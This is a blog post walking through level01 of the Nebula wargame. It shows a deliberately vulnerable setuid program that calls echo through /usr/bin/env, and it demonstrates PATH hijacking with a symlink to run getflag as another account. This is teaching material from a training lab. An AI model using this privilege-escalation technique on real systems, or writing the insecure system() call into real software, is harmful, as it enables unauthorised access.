Sunday, October 28, 2012

exploit-exercises Nebula: level01

In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");
The system() library call executes echo "and now what?"
level01@nebula:~$ ../flag01/flag01
and now what?
but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever came across scripts starting with #!/usr/bin/env python ? This is used for portability issues, as fixing a path (such as /usr/bin/python) wouldn't work when the Python interpreter is installed in a different location. How does env look for the specified program ? it simply searches in the directories specified in the PATH environment variable starting from the the first directory, and going through the directories in $PATH until it finds the looked-for program.
level01@nebula:~$ echo $PATH
How to attack this program ? We will prepend to $PATH a directory in which we will add a symbolic link echo pointing to /bin/getflag.
First we prepend /home/level01 to $PATH
level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ echo $PATH
Now we create a symbolic link /home/level01/echo to /bin/getflag
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag
Now flag01 will run our own /home/level01/echo that is simply a symbolic link to /bin/getflag.
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account

No comments:

Post a Comment